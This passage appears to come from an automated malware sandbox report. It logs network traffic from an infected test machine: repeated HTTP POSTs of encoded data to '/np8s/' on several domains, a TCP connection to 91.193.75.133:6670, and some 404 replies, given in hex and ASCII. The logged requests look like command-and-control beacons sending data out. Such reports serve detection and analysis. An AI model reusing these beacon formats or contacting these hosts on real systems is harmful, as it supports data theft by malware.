31 50 62 63 58 2d 64 7a 65 70 52 33 6c 53 72 52 57 4c 71 72 4e 2d 77 4d 42 38 45 59 72 63 5a 63 44 55 34 6d 35 73 62 54 73 48 72 42 57 34 53 38 44 6b 43 38 53 62 43 30 44 75 4e 7a 67 43 4d 64 54 78 6c 42 48 47 77 75 51 6c 6a 50 34 6c 76 76 6e 48 6b 55 53 4f 6d 59 65 75 61 6d 6a 49 66 32 66 4a 47 79 56 57 79 41 6e 59 66 47 4c 46 4e 74 30 76 49 33 6c 50 4e 35 44 67 57 6c 74 76 53 4e 49 47 61 46 72 6d 64 46 30 70 55 62 52 68 31 4e 45 7a 67 47 34 66 48 75 42 4b 6f 5a 28 79 4b 61 73 66 4d 46 68 77 4d 78 78 44 67 6e 42 69 46 4c 74 70 39 38 6f 6a 70 37 46 32 51 54 59 73 56 64 6c 48 6b 6f 6c 44 66 4b 32 74 63 54 31 58 4c 79 4e 4e 59 59 4c 64 32 78 6f 70 6c 61 57 72 34 6d 48 72 47 30 56 45 55 51 74 44 49 69 42 7a 50 30 6a 4c 4c 39 73 4b 58 4e 31 62 44 39 76 64 54 71 77 53 70 38 51 7a 4e 57 48 59 4c 6f 42 52 72 4f 70 79 75 36 57 4e 71 41 30 77 4c 5a 41 31 52 71 7a 38 6b 79 4a 39 7a 53 72 33 79 48 30 77 30 74 30 54 38 71 37 38 59 62 46 4b 43 7a 62 49 4d 59 38 37 43 6d 38 43 4a 62 5a 43 59 63 35 45 47 45 74 6d 67 4b 59
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.getbusinesscreditandfunding.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getbusinesscreditandfunding.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 37 72 64 58 7e 50 67 4f 4b 39 5a 4d 4b 38 4c 33 34 6a 6a 70 28 58 71 57 4e 59 56 34 68 46 49 57 6a 57 70 7a 75 61 57 4a 47 72 50 32 58 56 56 43 62 71 76 77 6d 6d 4a 67 39 5f 47 42 4b 42 67 6c 30 64 4c 55 70 6b 59 42 79 67 74 65 38 6a 7a 41 58 31 6c 70 68 63 70 72 7a 4d 28 5f 59 6b 61 36 72 4f 4f 73 39 65 6b 4c 32 76 52 79 46 39 36 61 75 2d 51 38 61 46 77 78 66 6d 65 63 65 63 52 46 76 67 69 78 57 6b 47 6b 62 58 64 50 69 2d 38 53 68 58 35 6e 56 65 76 77 67 75 32 37 6d 5f 79 77 4d 32 31 6f 51 48 66 6c 70 69 35 50 79 59 73 56 50 30 4c 51 57 43 70 2d 61 6c 54 44 5a 46 62 4c 72 57 4f 63 6c 79 6f 49 68 53 55 4d 4a 2d 35 69 4b 63 34 53 66 4b 51 34 47 67 54 34 43 48 53 59 62 39 56 44 61 37 4b 79 48 57 63 50 37 74 28 78 33 30 38 6f 70 63 6a 58 37 41 65 69 78 54 47 6f 52 31 4a 49 45 79 42 38 65 31 5a 71 5a 50 56 49 4e 32 67 4d 72 4f 43 58 67 61 76 78 42 34 66 69 39 4d 30 70 33 49 52 39 38 43 65 65 52 6c 39 74 47 62 6b 6c 73 79 32 36 47 41 34 4a 70 5a 61 36 78 5a 34 7a 70 4e 78 70 71 73 6e 69 47 47 62 77 39 4e 28 4e 31 38 74 6f 62 46 77 67 4d 46 30 52 4c 4e 34 44 37 66 32 64 38 71 63 44 4c 70 55 5a 58 38 73 48 43 7a 6c 4e 50 71 69 32 55 38 72 6f 79 4a 65 49 73 52 72 76 6c 70 49 6e 51 68 4c 62 45 44 52 33 6c 52 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=7rdX~PgOK9ZMK8L34jjp(XqWNYV4hFIWjWpzuaWJGrP2XVVCbqvwmmJg9_GBKBgl0dLUpkYBygte8jzAX1lphcprzM(_Yka6rOOs9ekL2vRyF96au-Q8aFwxfmececRFvgixWkGkbXdPi-8ShX5nVevwgu27m_ywM21oQHflpi5PyYsVP0LQWCp-alTDZFbLrWOclyoIhSUMJ-5iKc4SfKQ4GgT4CHSYb9VDa7KyHWcP7t(x308opcjX7AeixTGoR1JIEyB8e1ZqZPVIN2gMrOCXgavxB4fi9M0p3IR98CeeRl9tGbklsy26GA4JpZa6xZ4zpNxpqsniGGbw9N(N18tobFwgMF0RLN4D7f2d8qcDLpUZX8sHCzlNPqi2U8royJeIsRrvlpInQhLbEDR3lRM.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.getbusinesscreditandfunding.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getbusinesscreditandfunding.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 37 72 64 58 7e 4b 68 46 41 73 46 46 50 73 4f 6e 36 57 48 39 33 45 79 51 4c 6f 68 39 39 30 49 7a 30 58 34 45 71 62 6e 37 48 71 32 78 54 6c 35 6a 66 70 66 6f 6d 69 46 46 7a 74 69 64 5a 52 73 71 30 5a 76 2d 70 6b 63 42 7a 67 30 62 28 45 33 6d 58 58 39 71 73 63 70 58 79 4d 7e 38 4f 6d 7e 62 72 4f 37 4c 39 65 63 62 32 65 39 79 45 66 43 61 6f 39 34 33 48 31 78 62 42 33 79 51 42 73 63 70 76 6b 32 35 57 6b 4b 6b 62 6e 52 50 6a 65 4d 4e 32 41 46 6d 59 75 76 70 6c 75 33 72 39 76 50 57 4d 32 78 4b 51 47 7a 6c 71 51 64 50 79 49 4d 56 59 33 7a 54 59 53 70 5f 65 6c 54 53 64 46 65 4e 72 58 69 51 6c 33 45 32 68 67 49 4d 49 4f 35 76 49 37 45 72 56 37 52 75 4c 41 50 66 43 48 65 39 62 73 49 63 61 2d 79 53 48 67 59 30 6c 34 4c 4c 33 32 52 5f 76 38 6a 54 7a 67 65 35 78 54 47 4d 52 31 4a 32 45 79 52 38 65 32 70 71 49 65 6c 49 64 57 67 4c 6e 4f 43 53 6f 36 76 69 4d 59 6a 43 39 4d 73 66 33 4a 70 54 37 77 65 65 52 32 56 74 41 36 6b 6d 31 53 32 38 44 41 34 70 74 5a 61 6c 78 5a 34 42 70 4d 78 35 71 37 76 69 63 33 62 77 35 76 48 4e 6c 63 74 6f 65 46 77 69 46 6c 35 55 4c 4e 51 48 37 65 47 6a 38 35 77 44 4c 37 4d 5a 57 64 73 48 46 44 6c 4e 41 4b 6a 6f 61 5a 62 6a 78 4f 33 2d 69 67 37 5a 6d 72 6b 54 61 57 28 54 57 52 34 74 35 6d 38 39 4e 2d 32 54 74 73 43 34 79 68 41 69 35 6c 45 49 79 77 47 76 35 4d 7a 69 33 49 49 52 47 53 34 33 7e 5a 6c 47 54 46 57 72 47 36 45 7a 4d 71 36 4a 63 62 53 36 6c 67 4d 7a 6a 41 71 34 28 4f 53 58 68 47 51 6f 7e 4b 31 43 73 55 4f 57 55 67 45 6e 6d 41 4e 63 46 51 6f 37 59 33 48 
73 58 58 76 64 6d 6b 55 58 4c 58 48 51 67 51 61 49 56 4d 30 50 59 59 54 77 7e 39 36 73 77 69 73 79 74 72 42 71 4a 43 4d 5a 59 6c 6b 54 44 4f 73 30 41 35 5a 59 69 51 6e 73 58 67 48 6b 34 47 63 36 6e 56 6d 42 31 31 52 58 63 6c 68 2d 34 70 6e 76 68 4d 36 64 58 4f 41 79 4e 42 46 5a 79 49 66 36 6d 52 50 77 58 61 37 71 32 74 61 5f 62 4a 5a 51 6d 32 41 65 6b 65 39 43 38 6a 32 66 61 65 42 5a 76 46 6b 74 49 70 43 39 68 62 32 74 45 57 64 66 78 6e 4b 39 76 6b 34 4b 49 6d 5a 79 70 42 30 74 5a 31 55 75 47 70 68 46 54 58 72 4d 39 47 53 42 61 70 43 57 35 58 65 47 4c 4d 35 6f 38 2d 41 31 30 61 43 61 67 57 50 70 59 7a 50 78 66 50 33 6a 39 52 45 50 28 62 28 48 63 72 76 41 49 5a 41 50 4c 52 52 43 6a 61 61 79 76 43 61 58 77 64 38 31 62 56 68 4a 5a 69 77 5f 78 52 64 70 6a 6e 32 57 35 68 4b 2d 56 74 4b 54 6e 73 7a 4d 70 43 43 56 71 33 7a 4c 74 79 64 38 41 30 43 4b 6a 31 4c 68 28 6f 68 68 6e 56 49 75 4e 76 6f 45 4f 52 67 72 75 76 50 64 33 63 47 39 66 55 4a 4e 41 56 52 78 4e 76 68 6a 6b 6b 6c 35 63 79 46 35 4e 36 57 33 67 75 68 57
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.getbusinesscreditandfunding.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getbusinesscreditandfunding.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 37 72 64 58 7e 50 67 4f 4b 39 5a 4d 4b 38 4c 33 34 6a 6a 70 28 58 71 57 4e 59 56 34 68 46 49 57 6a 57 70 7a 75 61 57 4a 47 72 50 32 58 56 56 43 62 71 76 77 6d 6d 4a 67 39 5f 47 42 4b 42 67 6c 30 64 4c 55 70 6b 59 42 79 67 74 65 38 6a 7a 41 58 31 6c 70 68 63 70 72 7a 4d 28 5f 59 6b 61 36 72 4f 4f 73 39 65 6b 4c 32 76 52 79 46 39 36 61 75 2d 51 38 61 46 77 78 66 6d 65 63 65 63 52 46 76 67 69 78 57 6b 47 6b 62 58 64 50 69 2d 38 53 68 58 35 6e 56 65 76 77 67 75 32 37 6d 5f 79 77 4d 32 31 6f 51 48 66 6c 70 69 35 50 79 59 73 56 50 30 4c 51 57 43 70 2d 61 6c 54 44 5a 46 62 4c 72 57 4f 63 6c 79 6f 49 68 53 55 4d 4a 2d 35 69 4b 63 34 53 66 4b 51 34 47 67 54 34 43 48 53 59 62 39 56 44 61 37 4b 79 48 57 63 50 37 74 28 78 33 30 38 6f 70 63 6a 58 37 41 65 69 78 54 47 6f 52 31 4a 49 45 79 42 38 65 31 5a 71 5a 50 56 49 4e 32 67 4d 72 4f 43 58 67 61 76 78 42 34 66 69 39 4d 30 70 33 49 52 39 38 43 65 65 52 6c 39 74 47 62 6b 6c 73 79 32 36 47 41 34 4a 70 5a 61 36 78 5a 34 7a 70 4e 78 70 71 73 6e 69 47 47 62 77 39 4e 28 4e 31 38 74 6f 62 46 77 67 4d 46 30 52 4c 4e 34 44 37 66 32 64 38 71 63 44 4c 70 55 5a 58 38 73 48 43 7a 6c 4e 50 71 69 32 55 38 72 6f 79 4a 65 49 73 52 72 76 6c 70 49 6e 51 68 4c 62 45 44 52 33 6c 52 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=7rdX~PgOK9ZMK8L34jjp(XqWNYV4hFIWjWpzuaWJGrP2XVVCbqvwmmJg9_GBKBgl0dLUpkYBygte8jzAX1lphcprzM(_Yka6rOOs9ekL2vRyF96au-Q8aFwxfmececRFvgixWkGkbXdPi-8ShX5nVevwgu27m_ywM21oQHflpi5PyYsVP0LQWCp-alTDZFbLrWOclyoIhSUMJ-5iKc4SfKQ4GgT4CHSYb9VDa7KyHWcP7t(x308opcjX7AeixTGoR1JIEyB8e1ZqZPVIN2gMrOCXgavxB4fi9M0p3IR98CeeRl9tGbklsy26GA4JpZa6xZ4zpNxpqsniGGbw9N(N18tobFwgMF0RLN4D7f2d8qcDLpUZX8sHCzlNPqi2U8royJeIsRrvlpInQhLbEDR3lRM.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.getbusinesscreditandfunding.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getbusinesscreditandfunding.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 37 72 64 58 7e 4b 68 46 41 73 46 46 50 73 4f 6e 36 57 48 39 33 45 79 51 4c 6f 68 39 39 30 49 7a 30 58 34 45 71 62 6e 37 48 71 32 78 54 6c 35 6a 66 70 66 6f 6d 69 46 46 7a 74 69 64 5a 52 73 71 30 5a 76 2d 70 6b 63 42 7a 67 30 62 28 45 33 6d 58 58 39 71 73 63 70 58 79 4d 7e 38 4f 6d 7e 62 72 4f 37 4c 39 65 63 62 32 65 39 79 45 66 43 61 6f 39 34 33 48 31 78 62 42 33 79 51 42 73 63 70 76 6b 32 35 57 6b 4b 6b 62 6e 52 50 6a 65 4d 4e 32 41 46 6d 59 75 76 70 6c 75 33 72 39 76 50 57 4d 32 78 4b 51 47 7a 6c 71 51 64 50 79 49 4d 56 59 33 7a 54 59 53 70 5f 65 6c 54 53 64 46 65 4e 72 58 69 51 6c 33 45 32 68 67 49 4d 49 4f 35 76 49 37 45 72 56 37 52 75 4c 41 50 66 43 48 65 39 62 73 49 63 61 2d 79 53 48 67 59 30 6c 34 4c 4c 33 32 52 5f 76 38 6a 54 7a 67 65 35 78 54 47 4d 52 31 4a 32 45 79 52 38 65 32 70 71 49 65 6c 49 64 57 67 4c 6e 4f 43 53 6f 36 76 69 4d 59 6a 43 39 4d 73 66 33 4a 70 54 37 77 65 65 52 32 56 74 41 36 6b 6d 31 53 32 38 44 41 34 70 74 5a 61 6c 78 5a 34 42 70 4d 78 35 71 37 76 69 63 33 62 77 35 76 48 4e 6c 63 74 6f 65 46 77 69 46 6c 35 55 4c 4e 51 48 37 65 47 6a 38 35 77 44 4c 37 4d 5a 57 64 73 48 46 44 6c 4e 41 4b 6a 6f 61 5a 62 6a 78 4f 33 2d 69 67 37 5a 6d 72 6b 54 61 57 28 54 57 52 34 74 35 6d 38 39 4e 2d 32 54 74 73 43 34 79 68 41 69 35 6c 45 49 79 77 47 76 35 4d 7a 69 33 49 49 52 47 53 34 33 7e 5a 6c 47 54 46 57 72 47 36 45 7a 4d 71 36 4a 63 62 53 36 6c 67 4d 7a 6a 41 71 34 28 4f 53 58 68 47 51 6f 7e 4b 31 43 73 55 4f 57 55 67 45 6e 6d 41 4e 63 46 51 6f 37 59 33 48 
73 58 58 76 64 6d 6b 55 58 4c 58 48 51 67 51 61 49 56 4d 30 50 59 59 54 77 7e 39 36 73 77 69 73 79 74 72 42 71 4a 43 4d 5a 59 6c 6b 54 44 4f 73 30 41 35 5a 59 69 51 6e 73 58 67 48 6b 34 47 63 36 6e 56 6d 42 31 31 52 58 63 6c 68 2d 34 70 6e 76 68 4d 36 64 58 4f 41 79 4e 42 46 5a 79 49 66 36 6d 52 50 77 58 61 37 71 32 74 61 5f 62 4a 5a 51 6d 32 41 65 6b 65 39 43 38 6a 32 66 61 65 42 5a 76 46 6b 74 49 70 43 39 68 62 32 74 45 57 64 66 78 6e 4b 39 76 6b 34 4b 49 6d 5a 79 70 42 30 74 5a 31 55 75 47 70 68 46 54 58 72 4d 39 47 53 42 61 70 43 57 35 58 65 47 4c 4d 35 6f 38 2d 41 31 30 61 43 61 67 57 50 70 59 7a 50 78 66 50 33 6a 39 52 45 50 28 62 28 48 63 72 76 41 49 5a 41 50 4c 52 52 43 6a 61 61 79 76 43 61 58 77 64 38 31 62 56 68 4a 5a 69 77 5f 78 52 64 70 6a 6e 32 57 35 68 4b 2d 56 74 4b 54 6e 73 7a 4d 70 43 43 56 71 33 7a 4c 74 79 64 38 41 30 43 4b 6a 31 4c 68 28 6f 68 68 6e 56 49 75 4e 76 6f 45 4f 52 67 72 75 76 50 64 33 63 47 39 66 55 4a 4e 41 56 52 78 4e 76 68 6a 6b 6b 6c 35 63 79 46 35 4e 36 57 33 67 75 68 57
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.xn--wsthof-camping-gsb.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.xn--wsthof-camping-gsb.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 36 50 59 59 32 35 41 38 67 69 31 56 50 41 78 37 71 38 71 74 49 58 58 64 72 4f 73 39 35 50 68 32 58 64 62 7a 44 72 76 2d 6e 75 58 48 7e 68 55 51 4c 59 6e 6d 54 67 36 6a 69 38 74 4f 6f 6f 35 75 36 46 70 62 6b 6c 38 74 7a 47 62 35 61 4b 77 58 66 74 70 39 57 6e 30 4f 49 70 33 48 47 4c 79 76 69 73 4e 6a 56 33 57 41 74 55 6f 38 66 4e 31 72 75 6d 71 54 32 76 71 78 49 6b 79 6e 28 71 4d 38 72 77 77 44 6f 4c 73 4a 67 4d 33 32 37 79 73 45 45 41 36 69 57 4c 6e 4b 55 78 65 75 6c 65 6b 71 43 4b 51 76 59 30 4b 74 5a 56 4a 74 58 4e 57 42 50 7a 46 76 76 4b 38 69 51 48 61 63 76 79 6e 32 41 37 41 70 52 6d 7e 56 72 49 4c 33 32 71 46 44 6e 57 6b 77 31 51 59 74 42 5f 68 4d 78 33 4b 74 7e 6e 36 52 46 4c 74 57 68 31 53 37 36 2d 39 51 75 7a 62 70 34 34 53 5a 42 57 33 64 58 49 46 65 62 31 30 35 30 70 45 41 5a 48 66 62 38 72 71 47 51 78 70 47 49 6e 52 79 62 31 43 6f 65 31 6a 48 52 76 62 50 57 6a 51 49 71 52 6e 36 63 48 66 5f 73 6a 7e 6e 28 6b 68 66 33 6c 79 4e 28 51 4b 46 62 4f 4c 7a 73 5a 4c 4e 4b 4d 58 75 52 36 74 31 7e 34 54 6c 57 57 6c 6b 73 78 67 73 6b 4a 78 72 34 48 75 72 6f 78 44 41 37 62 74 41 37 59 6a 48 73 4d 4a 48 79 4d 64 49 44 77 68 78 4e 39 75 6f 43 34 35 78 4b 35 54 5a 41 62 4e 75 30 4e 4b 39 46 4d 4a 6b 51 74 45 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=6PYY25A8gi1VPAx7q8qtIXXdrOs95Ph2XdbzDrv-nuXH~hUQLYnmTg6ji8tOoo5u6Fpbkl8tzGb5aKwXftp9Wn0OIp3HGLyvisNjV3WAtUo8fN1rumqT2vqxIkyn(qM8rwwDoLsJgM327ysEEA6iWLnKUxeulekqCKQvY0KtZVJtXNWBPzFvvK8iQHacvyn2A7ApRm~VrIL32qFDnWkw1QYtB_hMx3Kt~n6RFLtWh1S76-9Quzbp44SZBW3dXIFeb1050pEAZHfb8rqGQxpGInRyb1Coe1jHRvbPWjQIqRn6cHf_sj~n(khf3lyN(QKFbOLzsZLNKMXuR6t1~4TlWWlksxgskJxr4HuroxDA7btA7YjHsMJHyMdIDwhxN9uoC45xK5TZAbNu0NK9FMJkQtE.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.xn--wsthof-camping-gsb.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.xn--wsthof-camping-gsb.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 36 50 59 59 32 38 34 32 6c 54 59 4a 46 77 4e 59 74 4f 61 35 52 30 66 66 6e 65 6f 69 6e 2d 68 54 54 6f 28 4e 65 5f 6a 70 32 63 47 43 7a 78 4a 77 42 2d 33 49 54 68 4b 5a 6f 5a 46 4b 69 6f 6c 74 36 42 4e 35 6b 6c 34 74 79 47 7a 70 61 73 68 4d 62 34 31 79 51 48 31 31 5a 5a 32 5a 43 4b 76 39 69 73 59 32 56 33 65 51 74 45 38 38 65 76 64 72 6f 6e 72 66 34 76 72 34 41 45 43 37 37 71 51 68 72 7a 41 62 6f 4f 55 4a 68 38 4c 32 36 54 63 62 54 54 69 6c 4a 37 6e 4c 52 78 66 36 73 37 38 2d 43 4b 45 52 59 32 4f 74 5a 6d 74 74 57 63 32 42 62 51 74 73 33 4b 38 6e 55 48 61 62 72 79 72 6e 41 37 63 31 52 6b 53 76 72 35 28 33 33 61 46 43 67 46 31 4e 77 48 4e 72 48 5f 46 72 78 33 50 78 7e 32 6d 7a 46 4b 41 33 32 58 62 50 7e 63 45 46 75 31 43 79 36 59 53 6e 4b 32 33 43 58 49 46 2d 62 31 30 48 30 70 30 41 5a 46 28 62 7e 4f 4f 47 53 42 70 48 55 58 52 39 44 6c 43 6e 61 31 76 65 52 76 53 77 57 68 52 64 71 6a 48 36 63 55 6e 5f 38 79 7e 67 33 55 68 6a 37 46 7a 4b 37 51 4c 4c 62 4f 4c 46 73 64 66 64 4a 39 48 75 58 2d 35 31 7a 36 37 6c 55 6d 6c 6b 69 52 67 75 76 70 39 37 34 48 32 56 6f 77 7a 32 34 71 6c 41 7e 65 33 48 73 70 39 48 7a 63 64 49 59 41 67 50 4f 38 66 77 48 61 46 32 42 37 7a 76 64 35 6c 6b 75 38 48 78 47 70 4e 42 4b 36 59 50 67 70 30 4b 45 51 57 57 39 77 50 31 64 71 75 77 6c 5a 4d 6d 56 30 49 34 28 6e 50 56 5a 4d 44 69 77 47 43 76 6d 32 6a 54 55 34 73 58 49 4c 66 53 67 7a 65 44 57 64 64 5f 71 6a 48 73 44 36 6b 42 36 33 61 53 35 73 53 37 4d 4e 31 48 7e 70 31 31 78 67 6d 7a 56 56 33 69 6c 6f 43 5f 7a 63 64 62 
41 41 48 57 41 35 46 61 4a 75 59 46 31 6a 72 65 68 30 58 4e 4d 79 67 78 4b 31 77 4c 5a 66 42 53 4f 2d 6e 79 5a 76 43 56 6e 37 43 54 6f 58 38 59 78 75 71 33 67 50 63 36 70 75 55 4a 6b 46 45 52 48 53 56 6b 52 70 44 51 4a 68 59 73 66 76 4c 54 61 54 50 75 75 44 36 71 32 62 45 49 32 7a 30 6c 31 6b 56 57 61 39 70 73 72 65 69 61 74 6e 67 59 74 59 33 47 6b 33 4d 34 52 71 30 2d 28 32 47 47 74 79 31 50 69 35 4d 68 51 4f 76 30 6c 4d 57 44 56 6a 50 52 78 61 74 5a 58 34 48 72 57 4a 54 36 69 65 43 75 62 74 49 4c 4f 78 49 36 41 65 53 47 48 70 39 6d 66 49 52 49 7e 46 73 6c 41 75 78 39 57 48 70 63 67 36 41 47 5a 6c 41 42 74 34 39 64 59 57 77 75 39 39 39 4d 28 6f 4f 74 38 47 71 49 6e 42 67 59 30 73 68 78 6e 54 70 4b 35 39 4a 76 39 7a 55 72 6b 64 34 46 6c 61 54 30 5a 4f 62 57 58 57 48 64 5a 68 59 46 57 5a 62 66 4f 59 70 39 38 56 43 74 67 73 38 52 39 5a 7a 4e 4d 64 57 4e 6d 4f 32 34 33 6d 7a 69 50 6c 5a 78 58 67 4e 76 59 32 76 6c 37 6c 6b 79 32 4a 55 35 6b 50 79 4b 4f 41 44 6a 67 71 43 31 49 6d 7a 47 4b 2d 76 75 63 37 56 62 79
Source: global traffic TCP traffic: 192.168.2.6:49722 -> 91.193.75.133:6670
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:04:30 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 27 May 2022 17:05:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 9X-Rate-Limit-Reset: 2022-05-27T17:05:17.4029455Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 27 May 2022 17:05:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 9X-Rate-Limit-Reset: 2022-05-27T17:05:17.4548107Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 27 May 2022 17:05:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 8X-Rate-Limit-Reset: 2022-05-27T17:05:17.4029455Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:05:51 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:05:51 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
